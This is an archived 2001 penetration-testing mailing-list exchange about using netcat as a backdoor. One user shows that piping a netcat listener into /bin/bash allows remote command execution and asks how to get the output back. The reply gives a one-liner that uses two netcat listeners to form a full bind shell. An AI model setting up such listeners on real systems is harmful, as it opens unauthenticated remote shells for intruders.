Penetration Testing mailing list archives
Re: [PEN-TEST] nc backdooring
From: Fyodor <fygrave () TIGERTEAM NET>
Date: Fri, 26 Jan 2001 01:39:34 +0700
nc -l -p 5050 | /bin/bash | nc -l -p 5051 2>&1 you will enter your stuff on port 5050 and get output on 5051 :) On Wed, Jan 24, 2001 at 10:52:19PM -0200, starlink wrote:
Hi, folks ! In one machine (the server - with root permission) I typed: nc -l -p 5050 | /bin/bash In another machine (the client) I typed: nc server_ip 5050 With this I could execute any program in the server. Both machines are Red Hat Linux. The question is: How can I can the output of the remote execution back? Is there nicer way of doing this with netcat? Thanks for any help! La-Roque
-- http://www.notlsd.net PGP fingerprint = 56DD 1511 DDDA 56D7 99C7 B288 5CE5 A713 0969 A4D1
Current thread:
- [PEN-TEST] nc backdooring starlink (Jan 25)
- Re: [PEN-TEST] nc backdooring Fyodor (Jan 25)
- Re: [PEN-TEST] nc backdooring Robert van der Meulen (Jan 25)
- Re: [PEN-TEST] nc backdooring Cold Fire (Jan 25)